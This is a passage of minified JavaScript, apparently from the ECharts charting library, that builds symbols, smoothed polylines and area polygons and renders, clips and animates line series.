h=t.getItemVisual(n,"symbolKeepAspect");this._createSymbol(o,t,n,s,l,h)}else{(d=this.childAt(0)).silent=!1;var p={scaleX:s[0]/2,scaleY:s[1]/2};c?d.attr(p):Bh(d,p,a,n),Gh(d)}if(this._updateCommon(t,n,s,i,r),u){var d=this.childAt(0);if(!c){p={scaleX:this._sizeX,scaleY:this._sizeY,style:{opacity:d.style.opacity}};d.scaleX=d.scaleY=0,d.style.opacity=0,zh(d,p,a,n)}}c&&this.childAt(0).stopAnimation("leave")},e.prototype._updateCommon=function(t,e,n,i,r){var o,a,s,l,u,c,h,p,d,f=this.childAt(0),g=t.hostModel;if(i&&(o=i.emphasisItemStyle,a=i.blurItemStyle,s=i.selectItemStyle,l=i.focus,u=i.blurScope,h=i.labelStatesModels,p=i.hoverScale,d=i.cursorStyle,c=i.emphasisDisabled),!i||t.hasItemOption){var v=i&&i.itemModel?i.itemModel:t.getItemModel(e),y=v.getModel("emphasis");o=y.getModel("itemStyle").getItemStyle(),s=v.getModel(["select","itemStyle"]).getItemStyle(),a=v.getModel(["blur","itemStyle"]).getItemStyle(),l=y.get("focus"),u=y.get("blurScope"),c=y.get("disabled"),h=Lp(v),p=y.getShallow("scale"),d=v.getShallow("cursor")}var m=t.getItemVisual(e,"symbolRotate");f.attr("rotation",(m||0)*Math.PI/180||0);var _=km(t.getItemVisual(e,"symbolOffset"),n);_&&(f.x=_[0],f.y=_[1]),d&&f.attr("cursor",d);var x=t.getItemVisual(e,"style"),b=x.fill;if(f instanceof Hl){var w=f.style;f.useStyle(A({image:w.image,x:w.x,y:w.y,width:w.width,height:w.height},x))}else f.__isEmptyBrush?f.useStyle(A({},x)):f.useStyle(x),f.style.decal=null,f.setColor(b,r&&r.symbolInnerColor),f.style.strokeNoScale=!0;var S=t.getItemVisual(e,"liftZ"),M=this._z2;null!=S?null==M&&(this._z2=f.z2,f.z2+=S):null!=M&&(f.z2=M,this._z2=null);var T=r&&r.useNameLabel;Pp(f,h,{labelFetcher:g,labelDataIndex:e,defaultText:function(e){return T?t.getName(e):ST(t,e)},inheritColor:b,defaultOpacity:x.opacity}),this._sizeX=n[0]/2,this._sizeY=n[1]/2;var k=f.ensureState("emphasis");k.style=o,f.ensureState("select").style=s,f.ensureState("blur").style=a;var C=null==p||!0===p?Math.max(1.1,3/this._sizeY):isFinite(p)&&p>0?+p:1;k.scaleX=this._sizeX*C,k.scaleY=this._sizeY*C,this.setSymbolScale(1),pc(this,l,u,c)},e.prototype.setSymbolScale=function(t){this.scaleX=this.scaleY=t},e.prototype.fadeOut=function(t,e,n){var i=this.childAt(0),r=hu(this).dataIndex,o=n&&n.animation;if(this.silent=i.silent=!0,n&&n.fadeLabel){var a=i.getTextContent();a&&Vh(a,{style:{opacity:0}},e,{dataIndex:r,removeOpt:o,cb:function(){i.removeTextContent()}})}else i.removeTextContent();Vh(i,{style:{opacity:0},scaleX:0,scaleY:0},e,{dataIndex:r,cb:t,removeOpt:o})},e.getSymbolSize=function(t,e){return Tm(t.getItemVisual(e,"symbolSize"))},e.getSymbolZ2=function(t,e){return t.getItemVisual(e,"z2")},e}(ho);function kT(t,e){this.parent.drift(t,e)}function CT(t,e,n,i){return e&&!isNaN(e[0])&&!isNaN(e[1])&&!(i&&i.isIgnore&&i.isIgnore(n))&&!(i&&i.clipShape&&!i.clipShape.contain(e[0],e[1]))&&"none"!==t.getItemVisual(n,"symbol")}function IT(t){return null==t||$(t)||(t={isIgnore:t}),t||{}}function DT(t){var e=t.hostModel,n=e.getModel("emphasis");return{emphasisItemStyle:n.getModel("itemStyle").getItemStyle(),blurItemStyle:e.getModel(["blur","itemStyle"]).getItemStyle(),selectItemStyle:e.getModel(["select","itemStyle"]).getItemStyle(),focus:n.get("focus"),blurScope:n.get("blurScope"),emphasisDisabled:n.get("disabled"),hoverScale:n.get("scale"),labelStatesModels:Lp(e),cursorStyle:e.get("cursor")}}function AT(t,e,n,i,r,o,a){var s=new t(e,n,i,r);return s.setPosition(o),e.setItemGraphicEl(n,s),a.add(s),s}var PT=function(){function t(t){this.group=new ho,this._SymbolCtor=t||TT}return t.prototype.updateData=function(t,e){this._progressiveEls=null,e=IT(e);var n=this.group,i=t.hostModel,r=this._data,o=this._SymbolCtor,a=e.disableAnimation,s=this._seriesScope=DT(t),l={disableAnimation:a},u=e.getSymbolPoint||function(e){return t.getItemLayout(e)};r||n.removeAll(),t.diff(r).add(function(i){var r=u(i);CT(t,r,i,e)&&AT(o,t,i,s,l,r,n)}).update(function(c,h){var p=r.getItemGraphicEl(h),d=u(c);if(CT(t,d,c,e)){var f=t.getItemVisual(c,"symbol")||"circle",g=p&&p.getSymbolType&&p.getSymbolType();if(!p||g&&g!==f)n.remove(p),(p=new o(t,c,s,l)).setPosition(d);else{p.updateData(t,c,s,l);var v={x:d[0],y:d[1]};a?p.attr(v):Bh(p,v,i)}n.add(p),t.setItemGraphicEl(c,p)}else n.remove(p)}).remove(function(t){var e=r.getItemGraphicEl(t);e&&e.fadeOut(function(){n.remove(e)},i)}).execute(),this._getSymbolPoint=u,this._data=t},t.prototype.updateLayout=function(t){var e=this._data;if(e)for(var n=this,i=0,r=e.getStore().count();i<r;i++){var o=e.getItemGraphicEl(i),a=n._getSymbolPoint(i);CT(e,a,i,t)?((o=o||AT(n._SymbolCtor,e,i,n._seriesScope,{disableAnimation:!0},a,n.group)).stopAnimation(),o.setPosition(a),o.markRedraw()):o&&(n.group.remove(o),e.setItemGraphicEl(i,null))}},t.prototype.incrementalPrepareUpdate=function(t){this._seriesScope=DT(t),this._data=null,this.group.removeAll()},t.prototype.incrementalUpdate=function(t,e,n,i){function r(t){t.isGroup||(t.incremental=n,t.ensureState("emphasis").hoverLayer=2)}this._progressiveEls=[],i=IT(i);for(var o=t.start;o<t.end;o++){var a=e.getItemLayout(o);if(CT(e,a,o,i)){var s=new this._SymbolCtor(e,o,this._seriesScope);s.traverse(r),s.setPosition(a),this.group.add(s),e.setItemGraphicEl(o,s),this._progressiveEls.push(s)}}},t.prototype.eachRendered=function(t){_p(this._progressiveEls||this.group,t)},t.prototype.remove=function(t){var e=this.group,n=this._data;n&&t?n.eachItemGraphicEl(function(t){t.fadeOut(function(){e.remove(t)},n.hostModel)}):e.removeAll()},t}();function LT(t,e,n){var i=t.getBaseAxis(),r=t.getOtherAxis(i),o=function(t,e){var n=0,i=t.scale.getExtent();"start"===e?n=i[0]:"end"===e?n=i[1]:K(e)&&!isNaN(e)?n=e:i[0]>0?n=i[0]:i[1]<0&&(n=i[1]);return n}(r,n),a=i.dim,s=r.dim,l=e.mapDimension(s),u=e.mapDimension(a),c="x"===s||"radius"===s?1:0,h=V(t.dimensions,function(t){return e.mapDimension(t)}),p=!1,d=e.getCalculationInfo("stackResultDimension");return Jx(e,h[0])&&(p=!0,h[0]=d),Jx(e,h[1])&&(p=!0,h[1]=d),{dataDimsForPoint:h,valueStart:o,valueAxisDim:s,baseAxisDim:a,stacked:!!p,valueDim:l,baseDim:u,baseDataOffset:c,stackedOverDimension:e.getCalculationInfo("stackedOverDimension")}}function OT(t,e,n,i){var r=NaN;t.stacked&&(r=n.get(n.getCalculationInfo("stackedOverDimension"),i)),isNaN(r)&&(r=t.valueStart);var o=t.baseDataOffset,a=[];return a[o]=n.get(t.baseDim,i),a[1-o]=r,e.dataToPoint(a)}function RT(t,e){return!isFinite(t)||!isFinite(e)}var NT=typeof Float32Array!==pu?Float32Array:void 0,BT=typeof Float64Array!==pu?Float64Array:void 0;function zT(t){return ET({ctor:NT},t).arr}function ET(t,e){var n=t.arr,i=t.ctor;if(e>Uo&&(e=Uo),!n||t.typed&&n.length<e){var r=void 0;if(i)try{r=new i(e),t.typed=!0,n&&r.set(n)}catch(t){0}if(!r&&(r=[],t.typed=!1,n))for(var o=0,a=n.length;o<a;o++)r[o]=n[o];t.arr=r}return t}var VT=Math.min,FT=Math.max;function HT(t,e,n,i,r,o,a,s,l){for(var u,c,h,p,d,f,g=n,v=0;v<i;v++){var y=e[2*g],m=e[2*g+1];if(g>=r||g<0)break;if(RT(y,m)){if(l){g+=o;continue}break}if(g===n)t[o>0?"moveTo":"lineTo"](y,m),h=y,p=m;else{var _=y-u,x=m-c;if(_*_+x*x<.5){g+=o;continue}if(a>0){for(var b=g+o,w=e[2*b],S=e[2*b+1];w===y&&S===m&&v<i;)v++,g+=o,w=e[2*(b+=o)],S=e[2*b+1],_=(y=e[2*g])-u,x=(m=e[2*g+1])-c;var M=v+1;if(l)for(;RT(w,S)&&M<i;)M++,w=e[2*(b+=o)],S=e[2*b+1];var T=.5,k=0,C=0,I=void 0,D=void 0;if(M>=i||RT(w,S))d=y,f=m;else{k=w-u,C=S-c;var A=y-u,P=w-y,L=m-c,O=S-m,R=void 0,N=void 0;if("x"===s){var B=k>0?1:-1;d=y-B*(R=Math.abs(A))*a,f=m,I=y+B*(N=Math.abs(P))*a,D=m}else if("y"===s){var z=C>0?1:-1;d=y,f=m-z*(R=Math.abs(L))*a,I=y,D=m+z*(N=Math.abs(O))*a}else R=Math.sqrt(A*A+L*L),d=y-k*a*(1-(T=(N=Math.sqrt(P*P+O*O))/(N+R))),f=m-C*a*(1-T),D=m+C*a*T,I=VT(I=y+k*a*T,FT(w,y)),D=VT(D,FT(S,m)),I=FT(I,VT(w,y)),f=m-(C=(D=FT(D,VT(S,m)))-m)*R/N,d=VT(d=y-(k=I-y)*R/N,FT(u,y)),f=VT(f,FT(c,m)),I=y+(k=y-(d=FT(d,VT(u,y))))*N/R,D=m+(C=m-(f=FT(f,VT(c,m))))*N/R}t.bezierCurveTo(h,p,d,f,y,m),h=I,p=D}else t.lineTo(y,m)}u=y,c=m,g+=o}return v}var GT=function(){this.smooth=0,this.smoothConstraint=!0},WT=function(t){function e(e){var n=t.call(this,e)||this;return n.type="ec-polyline",n}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:Cf.color.neutral99,fill:null}},e.prototype.getDefaultShape=function(){return new GT},e.prototype.buildPath=function(t,e){var n=e.points,i=0,r=n.length/2;if(e.connectNulls){for(;r>0&&RT(n[2*r-2],n[2*r-1]);r--);for(;i<r&&RT(n[2*i],n[2*i+1]);i++);}for(;i<r;)i+=HT(t,n,i,r,r,1,e.smooth,e.smoothMonotone,e.connectNulls)+1},e.prototype.getPointOn=function(t,e){this.path||(this.createPathProxy(),this.buildPath(this.path,this.shape));for(var n,i,r=this.path.data,o=gl.CMD,a="x"===e,s=[],l=0;l<r.length;){var u=void 0,c=void 0,h=void 0,p=void 0,d=void 0,f=void 0,g=void 0;switch(r[l++]){case o.M:n=r[l++],i=r[l++];break;case o.L:if(u=r[l++],c=r[l++],(g=a?(t-n)/(u-n):(t-i)/(c-i))<=1&&g>=0){var v=a?(c-i)*g+i:(u-n)*g+n;return a?[t,v]:[v,t]}n=u,i=c;break;case o.C:u=r[l++],c=r[l++],h=r[l++],p=r[l++],d=r[l++],f=r[l++];var y=a?En(n,u,h,d,t,s):En(i,c,p,f,t,s);if(y>0)for(var m=0;m<y;m++){var _=s[m];if(_<=1&&_>=0){v=a?Bn(i,c,p,f,_):Bn(n,u,h,d,_);return a?[t,v]:[v,t]}}n=d,i=f}}},e}(Bl),UT=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e}(GT),ZT=function(t){function e(e){var n=t.call(this,e)||this;return n.type="ec-polygon",n}return n(e,t),e.prototype.getDefaultShape=function(){return new UT},e.prototype.buildPath=function(t,e){var n=e.points,i=e.stackedOnPoints,r=0,o=n.length/2,a=e.smoothMonotone;if(e.connectNulls){for(;o>0&&RT(n[2*o-2],n[2*o-1]);o--);for(;r<o&&RT(n[2*r],n[2*r+1]);r++);}for(;r<o;){var s=HT(t,n,r,o,o,1,e.smooth,a,e.connectNulls);HT(t,i,r+s-1,s,o,-1,e.stackedOnSmooth,a,e.connectNulls),r+=s+1,t.closePath()}},e}(Bl);function YT(t,e,n,i,r){var o=t.getArea(),a=o.x,s=o.y,l=o.width,u=o.height,c=n.get(["lineStyle","width"])||0;a-=c/2,s-=c/2,l+=c,u+=c,l=Math.ceil(l),a!==Math.floor(a)&&(a=Math.floor(a),l++);var h=new jl({shape:{x:a,y:s,width:l,height:u}});if(e){var p=t.getBaseAxis(),d=p.isHorizontal(),f=p.inverse;d?(f&&(h.shape.x+=l),h.shape.width=0):(f||(h.shape.y+=u),h.shape.height=0);var g=X(r)?function(t){r(t,h)}:null;zh(h,{shape:{width:l,height:u,x:a,y:s}},n,null,i,g)}return h}function XT(t,e,n){var i=t.getArea(),r=zo(i.r0,1),o=zo(i.r,1),a=new eh({shape:{cx:zo(t.cx,1),cy:zo(t.cy,1),r0:r,r:o,startAngle:i.startAngle,endAngle:i.endAngle,clockwise:i.clockwise}});e&&("angle"===t.getBaseAxis().dim?a.shape.endAngle=i.startAngle:a.shape.r=r,zh(a,{shape:{endAngle:i.endAngle,r:o}},n));return a}function jT(t){var e=t.coordinateSystem;if(t.get("clip",!0)&&e&&(!e.shouldClip||e.shouldClip()))return e.getArea&&e.getArea(.1)}function qT(t,e){return t.type===e}function KT(t,e){e&&(e.font=e.textFont||e.font,wt(e,"textStrokeWidth")&&(t.lineWidth=e.textStrokeWidth),wt(e,"textAlign")&&(t.align=e.textAlign),wt(e,"textVerticalAlign")&&(t.verticalAlign=e.textVerticalAlign),wt(e,"textLineHeight")&&(t.lineHeight=e.textLineHeight),wt(e,"textWidth")&&(t.width=e.textWidth),wt(e,"textHeight")&&(t.height=e.textHeight),wt(e,"textBackgroundColor")&&(t.backgroundColor=e.textBackgroundColor),wt(e,"textPadding")&&(t.padding=e.textPadding),wt(e,"textBorderColor")&&(t.borderColor=e.textBorderColor),wt(e,"textBorderWidth")&&(t.borderWidth=e.textBorderWidth),wt(e,"textBorderRadius")&&(t.borderRadius=e.textBorderRadius),wt(e,"textBoxShadowColor")&&(t.shadowColor=e.textBoxShadowColor),wt(e,"textBoxShadowBlur")&&(t.shadowBlur=e.textBoxShadowBlur),wt(e,"textBoxShadowOffsetX")&&(t.shadowOffsetX=e.textBoxShadowOffsetX),wt(e,"textBoxShadowOffsetY")&&(t.shadowOffsetY=e.textBoxShadowOffsetY))}function $T(t,e){if(t.length===e.length){for(var n=0;n<t.length;n++)if(t[n]!==e[n])return;return!0}}function QT(t){for(var e=[1/0,-1/0],n=[1/0,-1/0],i=0;i<t.length;){var r=t[i++],o=t[i++];RT(r,o)||(Ra(e,r),Ra(n,o))}return[e,n]}function JT(t,e){var n=QT(t),i=n[0],r=n[1],o=QT(e),a=o[0],s=o[1];return Math.max(Math.abs(i[0]-a[0]),Math.abs(r[0]-s[0]),Math.abs(i[1]-a[1]),Math.abs(r[1]-s[1]))}function tk(t){return K(t)?t:t?.5:0}function ek(t,e,n,i,r){var o=n.getBaseAxis(),a="x"===o.dim||"radius"===o.dim?0:1,s=[],l=0,u=[],c=[],h=[],p=[];if(r){for(l=0;l<t.length;l+=2){var d=e||t;RT(d[l],d[l+1])||p.push(t[l],t[l+1])}t=p}for(l=0;l<t.length-2;l+=2)switch(h[0]=t[l+2],h[1]=t[l+3],c[0]=t[l],c[1]=t[l+1],s.push(c[0],c[1]),i){case"end":u[a]=h[a],u[1-a]=c[1-a],s.push(u[0],u[1]);break;case"middle":var f=(c[a]+h[a])/2,g=[];u[a]=g[a]=f,u[1-a]=c[1-a],g[1-a]=h[1-a],s.push(u[0],u[1]),s.push(g[0],g[1]);break;default:u[a]=c[a],u[1-a]=h[1-a],s.push(u[0],u[1])}return s.push(t[l++],t[l++]),s}function nk(t,e,n){var i=t.getVisual("visualMeta");if(i&&i.length&&t.count()&&"cartesian2d"===e.type){for(var r,o,a=i.length-1;a>=0;a--){var s=t.getDimensionInfo(i[a].dimension);if("x"===(r=s&&s.coordDim)||"y"===r){o=i[a];break}}if(o){var l=e.getAxis(r),u=V(o.stops,function(t){return{coord:l.toGlobalCoord(l.dataToCoord(t.value)),color:t.color}}),c=u.length,h=o.outerColors.slice();c&&u[0].coord>u[c-1].coord&&(u.reverse(),h.reverse());var p=function(t,e){var n,i,r=[],o=t.length;function a(t,e,n){var i=t.coord;return{coord:n,color:vi((n-i)/(e.coord-i),[t.color,e.color])}}for(var s=0;s<o;s++){var l=t[s],u=l.coord;if(u<0)n=l;else{if(u>e){i?r.push(a(i,l,e)):n&&r.push(a(n,l,0),a(n,l,e));break}n&&(r.push(a(n,l,0)),n=null),r.push(l),i=l}}return r}(u,"x"===r?n.getWidth():n.getHeight()),d=p.length;if(!d&&c)return u[0].coord<0?h[1]?h[1]:u[c-1].color:h[0]?h[0]:u[0].color;var f=p[0].coord-10,g=p[d-1].coord+10,v=g-f;if(v<.001)return"transparent";E(p,function(t){t.offset=(t.coord-f)/v}),p.push({offset:d?p[d-1].offset:.5,color:h[1]||"transparent"}),p.unshift({offset:d?p[0].offset:.5,color:h[0]||"transparent"});var y=new xh(0,0,0,0,p,!0);return y[r]=f,y[r+"2"]=g,y}}}function ik(t,e,n){var i=t.get("showAllSymbol"),r="auto"===i;if(!i||r){var o=n.getAxesByScale("ordinal")[0];if(o&&(!r||!function(t,e){var n=t.getExtent(),i=Math.abs(n[1]-n[0])/t.scale.count();isNaN(i)&&(i=0);for(var r=e.count(),o=Math.max(1,Math.round(r/5)),a=0;a<r;a+=o)if(1.5*TT.getSymbolSize(e,a)[t.isHorizontal()?1:0]>i)return!1;return!0}(o,e))){var a=e.mapDimension(o.dim),s={};return E(o.getViewLabels(),function(t){t.tick.offInterval||(s[rw(o.scale,t.tick)]=1)}),function(t){return!s.hasOwnProperty(e.get(a,t))}}}}function rk(t,e){return[t[2*e],t[2*e+1]]}function ok(t){if(t.get(["endLabel","show"]))return!0;for(var e=0;e<Du.length;e++)if(t.get([Du[e],"endLabel","show"]))return!0;return!1}function ak(t,e,n,i){if(qT(e,"cartesian2d")){var r=i.getModel("endLabel"),o=r.get("valueAnimation"),a=i.getData(),s={lastFrameIndex:0},l=ok(i)?function(n,i){t._endLabelOnDuring(n,i,a,s,o,r,e)}:null,u=e.getBaseAxis().isHorizontal(),c=YT(e,n,i,function(){var e=t._endLabel;e&&n&&null!=s.originalX&&e.attr({x:s.originalX,y:s.originalY})},l);if(!i.get("clip",!0)){var h=c.shape,p=Math.max(h.width,h.height);u?(h.y-=p,h.height+=2*p):(h.x-=p,h.width+=2*p)}return l&&l(1,c),c}return XT(e,n,i)}var sk=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.init=function(){var t=new ho,e=new PT;this.group.add(e.group),this._symbolDraw=e,this._lineGroup=t,this._changePolyState=U(this._changePolyState,this)},e.prototype.render=function(t,e,n){var i=t.coordinateSystem,r=this.group,o=t.getData(),a=t.getModel("lineStyle"),s=t.getModel("areaStyle"),l=o.getLayout("points")||[],u="polar"===i.type,c=this._coordSys,h=this._symbolDraw,p=this._polyline,d=this._polygon,f=this._lineGroup,g=!e.ssr&&t.get("animation"),v=!s.isEmpty(),y=s.get("origin"),m=LT(i,o,y),_=v&&function(t,e,n){if(null==n.valueDim)return[];for(var i=e.count(),r=zT(2*i),o=0;o<i;o++){var a=OT(n,t,e,o);r[2*o]=a[0],r[2*o+1]=a[1]}return r}(i,o,m),x=t.get("showSymbol"),b=t.get("connectNulls"),w=x&&!u&&ik(t,o,i),S=this._data;S&&S.eachItemGraphicEl(function(t,e){t.__temp&&(r.remove(t),S.setItemGraphicEl(e,null))}),x||h.remove(),r.add(f);var M,T=!u&&t.get("step");i&&i.getArea&&t.get("clip",!0)&&(null!=(M=i.getArea()).width?(M.x-=.1,M.y-=.1,M.width+=.2,M.height+=.2):M.r0&&(M.r0-=.5,M.r+=.5)),this._clipShapeForSymbol=M;var k=nk(o,i,n)||o.getVisual("style")[o.getVisual("drawType")];if(p&&c.type===i.type&&T===this._step){v&&!d?d=this._newPolygon(l,_):d&&!v&&(f.remove(d),d=this._polygon=null),u||this._initOrUpdateEndLabel(t,i,nf(k));var C=f.getClipPath();if(C)zh(C,{shape:ak(this,i,!1,t).shape},t);else f.setClipPath(ak(this,i,!0,t));x&&h.updateData(o,{isIgnore:w,clipShape:M,disableAnimation:!0,getSymbolPoint:function(t){return[l[2*t],l[2*t+1]]}}),$T(this._stackedOnPoints,_)&&$T(this._points,l)||(g?this._doUpdateAnimation(o,_,i,n,T,y,b):(T&&(_&&(_=ek(_,l,i,T,b)),l=ek(l,null,i,T,b)),p.setShape({points:l}),d&&d.setShape({points:l,stackedOnPoints:_})))}else x&&h.updateData(o,{isIgnore:w,clipShape:M,disableAnimation:!0,getSymbolPoint:function(t){return[l[2*t],l[2*t+1]]}}),g&&this._initSymbolLabelAnimation(o,i,M),T&&(_&&(_=ek(_,l,i,T,b)),l=ek(l,null,i,T,b)),p=this._newPolyline(l),v?d=this._newPolygon(l,_):d&&(f.remove(d),d=this._polygon=null),u||this._initOrUpdateEndLabel(t,i,nf(k)),f.setClipPath(ak(this,i,!0,t));var I=t.getModel("emphasis"),D=I.get("focus"),A=I.get("blurScope"),P=I.get("disabled");(p.useStyle(L(a.getLineStyle(),{fill:"none",stroke:k,lineJoin:"bevel"})),gc(p,t,"lineStyle"),p.style.lineWidth>0&&"bolder"===t.get(["emphasis","lineStyle","width"]))&&(p.getState("emphasis").style.lineWidth=+p.style.lineWidth+1);hu(p).seriesIndex=t.seriesIndex,pc(p,D,A,P);var O=tk(t.get("smooth")),R=t.get("smoothMonotone");if(p.setShape({smooth:O,smoothMonotone:R,connectNulls:b}),d){var N=o.getCalculationInfo("stackedOnSeries"),B=0;d.useStyle(L(s.getAreaStyle(),{fill:k,opacity:.7,lineJoin:"bevel",decal:o.getVisual("style").decal})),N&&(B=tk(N.get("smooth"))),d.setShape({smooth:O,stackedOnSmooth:B,smoothMonotone:R,connectNulls:b}),gc(d,t,"areaStyle"),hu(d).seriesIndex=t.seriesIndex,pc(d,D,A,P)}var z=this._changePolyState;o.eachItemGraphicEl(function(t){t&&(t.onHoverStateChange=z)}),this._polyline.onHoverStateChange=z,this._data=o,this._coordSys=i,this._stackedOnPoints=_,this._points=l,this._step=T,this._valueOrigin=y;var E=t.get("triggerEvent"),V=t.get("triggerLineEvent");var F=!0===V||!0===E||"line"===E,H=!0===V||!0===E||"area"===E;this.packEventData(t,p,F),d&&this.packEventData(t,d,H)},e.prototype.packEventData=function(t,e,n){hu(e).eventData=n?{componentType:"series",componentSubType:"line",componentIndex:t.componentIndex,seriesIndex:t.seriesIndex,seriesName:t.name,seriesType:"line",selfType:e===this._polygon?"area":"line"}:null},e.prototype.highlight=function(t,e,n,i){var r=t.getData(),o=Ma(r,i);if(this._changePolyState("emphasis"),!(o instanceof Array)&&null!=o&&o>=0){var a=r.getLayout("points"),s=r.getItemGraphicEl(o);if(!s){var l=a[2*o],u=a[2*o+1];if(RT(l,u))return;if(this._clipShapeForSymbol&&!this._clipShapeForSymbol.contain(l,u))return;var c=t.get("zlevel")||0,h=t.get("z")||0;(s=new TT(r,o)).x=l,s.y=u,s.setZ(c,h);var p=s.getSymbolPath().getTextContent();p&&(p.zlevel=c,p.z=h,p.z2=this._polyline.z2+1),s.__temp=!0,r.setItemGraphicEl(o,s),s.stopSymbolAnimation(!0),this.group.add(s)}s.highlight()}else cy.prototype.highlight.call(this,t,e,n,i)},e.prototype.downplay=function(t,e,n,i){var r=t.getData(),o=Ma(r,i);if(this._changePolyState("normal"),null!=o&&o>=0){var a=r.getItemGraphicEl(o);a&&(a.__temp?(r.setItemGraphicEl(o,null),this.group.remove(a)):a.downplay())}else cy.prototype.downplay.call(this,t,e,n,i)},e.prototype._changePolyState=function(t){var e=this._polygon;Xu(this._polyline,t),e&&Xu(e,t)},e.prototype._newPolyline=function(t){var e=this._polyline;return e&&this._lineGroup.remove(e),e=new WT({shape:{points:t},segmentIgnoreThreshold:2,z2:10}),this._lineGroup.add(e),this._polyline=e,e},e.prototype._newPolygon=function(t,e){var n=this._polygon;return n&&this._lineGroup.remove(n),n=new ZT({shape:{points:t,stackedOnPoints:e},segmentIgnoreThreshold:2}),this._lineGroup.add(n),this._polygon=n,n},e.prototype._initSymbolLabelAnimation=function(t,e,n){var i,r,o=e.getBaseAxis(),a=o.inverse;"cartesian2d"===e.type?(i=o.isHorizontal(),r=!1):"polar"===e.type&&(i="angle"===o.dim,r=!0);var s=t.hostModel,l=s.get("animationDuration");X(l)&&(l=l(null));var u=s.get("animationDelay")||0,c=X(u)?u(null):u;t.eachItemGraphicEl(function(t,o){var s=t;if(s){var h=[t.x,t.y],p=void 0,d=void 0,f=void 0;if(n)if(r){var g=n,v=e.pointToCoord(h);i?(p=g.startAngle,d=g.endAngle,f=-v[1]/180*Math.PI):(p=g.r0,d=g.r,f=v[0])}else{var y=n;i?(p=y.x,d=y.x+y.width,f=t.x):(p=y.y+y.height,d=y.y,f=t.y)}var m=d===p?0:(f-p)/(d-p);a&&(m=1-m);var _=X(u)?u(o):l*m+c,x=s.getSymbolPath(),b=x.getTextContent();s.attr({scaleX:0,scaleY:0}),s.animateTo({scaleX:1,scaleY:1},{duration:200,setToFinal:!0,delay:_}),b&&b.animateFrom({style:{opacity:0}},{duration:300,delay:_}),x.disableLabelAnimation=!0}})},e.prototype._initOrUpdateEndLabel=function(t,e,n){var i=t.getModel("endLabel");if(ok(t)){var r=t.getData(),o=this._polyline,a=r.getLayout("points");if(!a)return o.removeTextContent(),void(this._endLabel=null);var s=this._endLabel;s||((s=this._endLabel=new Ql({z2:200})).ignoreClip=!0,o.setTextContent(this._endLabel),o.disableLabelAnimation=!0);var l=function(t){for(var e=t.length/2;e>0&&RT(t[2*e-2],t[2*e-1]);e--);return e-1}(a);l>=0&&(Pp(o,Lp(t,"endLabel"),{inheritColor:n,labelFetcher:t,labelDataIndex:l,defaultText:function(t,e,n){return null!=n?MT(r,n):ST(r,t)},enableTextSetter:!0},function(t,e){var n=e.getBaseAxis(),i=n.isHorizontal(),r=n.inverse,o=i?r?"right":"left":"center",a=i?"middle":r?"top":"bottom";return{normal:{align:t.get("align")||o,verticalAlign:t.get("verticalAlign")||a}}}(i,e)),o.textConfig.position=null)}else this._endLabel&&(this._polyline.removeTextContent(),this._endLabel=null)},e.prototype._endLabelOnDuring=function(t,e,n,i,r,o,a){var s=this._endLabel,l=this._polyline;if(s){t<1&&null==i.originalX&&(i.originalX=s.x,i.originalY=s.y);var u=n.getLayout("points"),c=n.hostModel,h=c.get("connectNulls"),p=o.get("precision"),d=o.get("distance")||0,f=a.getBaseAxis(),g=f.isHorizontal(),v=f.inverse,y=e.shape,m=v?g?y.x:y.y+y.height:g?y.x+y.width:y.y,_=(g?d:0)*(v?-1:1),x=(g?0:-d)*(v?-1:1),b=g?"x":"y",w=function(t,e,n){for(var i,r,o=t.length/2,a="x"===n?0:1,s=0,l=-1,u=0;u<o;u++)if(!RT(r=t[2*u+a],t[2*u+1-a]))if(0!==u){if(i<=e&&r>=e||i>=e&&r<=e){l=u;break}s=u,i=r}else i=r;return{range:[s,l],t:(e-i)/(r-i)}}(u,m,b),S=w.range,M=S[1]-S[0],T=void 0;if(M>=1){if(M>1&&!h){var k=rk(u,S[0]);s.attr({x:k[0]+_,y:k[1]+x}),r&&(T=c.getRawValue(S[0]))}else{(k=l.getPointOn(m,b))&&s.attr({x:k[0]+_,y:k[1]+x});var C=c.getRawValue(S[0]),I=c.getRawValue(S[1]);r&&(T=function(t,e,n,i,r){var o=null==e||"auto"===e;if(null==i)return i;if(K(i))return zo(f=ca(n||0,i,r),o?Math.max(Vo(n||0),Vo(i)):e);if(j(i))return r<1?n:i;for(var a=[],s=n,l=i,u=Math.max(s?s.length:0,l.length),c=0;c<u;++c){var h=t.getDimensionInfo(c);if(h&&"ordinal"===h.type)a[c]=(r<1&&s?s:l)[c];else{var p=s&&s[c]?s[c]:0,d=l[c],f=ca(p,d,r);a[c]=zo(f,o?Math.max(Vo(p),Vo(d)):e)}}return a}(n,p,C,I,w.t))}i.lastFrameIndex=S[0]}else{var D=1===t||i.lastFrameIndex>0?S[0]:0;k=rk(u,D);r&&(T=c.getRawValue(D)),s.attr({x:k[0]+_,y:k[1]+x})}if(r){var A=Fp(s);"function"==typeof A.setLabelText&&A.setLabelText(T)}}},e.prototype._doUpdateAnimation=function(t,e,n,i,r,o,a){var s=this._polyline,l=this._polygon,u=t.hostModel,c=function(t,e,n,i,r,o,a){for(var s=function(t,e){var n=[];return e.diff(t).add(function(t){n.push({cmd:"+",idx:t})}).update(function(t,e){n.push({cmd:"=",idx:e,idx1:t})}).remove(function(t){n.push({cmd:"-",idx:t})}).execute(),n}(t,e),l=[],u=[],c=[],h=[],p=[],d=[],f=[],g=LT(r,e,a),v=t.getLayout("points")||[],y=e.getLayout("points")||[],m=0;m<s.length;m++){var _=s[m],x=!0,b=void 0,w=void 0;switch(_.cmd){case"=":b=2*_.idx,w=2*_.idx1;var S=v[b],M=v[b+1],T=y[w],k=y[w+1];(isNaN(S)||isNaN(M))&&(S=T,M=k),l.push(S,M),u.push(T,k),c.push(n[b],n[b+1]),h.push(i[w],i[w+1]),f.push(e.getRawIndex(_.idx1));break;case"+":var C=_.idx,I=g.dataDimsForPoint,D=r.dataToPoint([e.get(I[0],C),e.get(I[1],C)]);w=2*C,l.push(D[0],D[1]),u.push(y[w],y[w+1]);var A=OT(g,r,e,C);c.push(A[0],A[1]),h.push(i[w],i[w+1]),f.push(e.getRawIndex(C));break;case"-":x=!1}x&&(p.push(_),d.push(d.length))}d.sort(function(t,e){return f[t]-f[e]});var P=l.length,L=zT(P),O=zT(P),R=zT(P),N=zT(P),B=[];for(m=0;m<d.length;m++){var 